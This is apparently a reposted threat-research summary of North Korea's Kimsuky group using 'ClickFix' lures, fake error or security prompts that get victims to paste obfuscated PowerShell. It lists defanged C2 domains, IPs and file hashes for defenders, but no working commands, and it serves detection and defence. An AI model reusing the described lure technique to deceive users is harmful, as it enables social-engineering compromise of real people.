Threat Research

Analysis of Kim Sooki Group Threat Cases Using the ‘ClickFix’ Tactics

Genians-Korea
Analysis of Kim Sooki Group Threat Cases Using the ‘ClickFix’ Tactics

The Kimsuky group’s ClickFix tactic manipulates victims into executing malicious PowerShell commands via deceptive messages and phishing emails, often disguising itself as error notifications or security procedures. This threat has been employed by state-sponsored actors from North Korea, Iran, and Russia, emphasizing the need for robust EDR detection strategies against obfuscated malware and unusual behaviors. #ClickFix #Kimsuky #BabyShark

Keypoints

  • Kimsuky group uses the ClickFix tactic to deceive victims into executing malicious commands by impersonating error messages or security document procedures.
  • ClickFix attacks involve victims manually copying and pasting obfuscated PowerShell commands that execute malicious activities.
  • ClickFix has been observed in spear phishing emails, fake websites, and misleading notifications targeting high-profile individuals and organizations.
  • State-sponsored threat actors from North Korea, Iran, and Russia have been linked to ClickFix-based campaigns.
  • Obfuscation techniques, such as string reversal and code insertion, are employed to evade detection by security products.
  • Enhanced Endpoint Detection and Response (EDR) strategies are critical for identifying and mitigating ClickFix attacks and related abnormal behaviors.
  • Recorded Indicators of Compromise include multiple malicious domains, IP addresses, and file hashes connected to Kimsuky’s BabyShark campaigns.

MITRE Techniques

  • [T1204.004] User Execution: Malicious Copy and Paste – Victims are tricked into copying and pasting malicious commands into PowerShell, as described: β€˜Victims are tricked into copying and pasting malicious commands into PowerShell.’

Indicators of Compromise

  • [Domain] Malicious command and control domains – konamo[.]xyz, kida.plusdocs.kro[.]kr, securedrive.fin-tech[.]com, raedom[.]store, and others.
  • [IP Address] Command and control servers and related infrastructure – 1.223.129[.]234 (KR), 103.149.98[.]248 (VN), 115.92.4[.]123 (KR), 38.180.157[.]197 (NL), and other IPs linked to C2 activities.
  • [File Hash] Malicious LNK and script files used in attacks – 40ce5cf6be259120d179f51993aec854, a523bf5dca0f2a4ace0cf766d9225343, fc4c319d7940ad1b7c0477469420bd11, 89a725b08ab0e8885fc03b543638be96, and other hashes.

Read more: https://www.genians.co.kr/blog/threat_intelligence/suky-castle

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint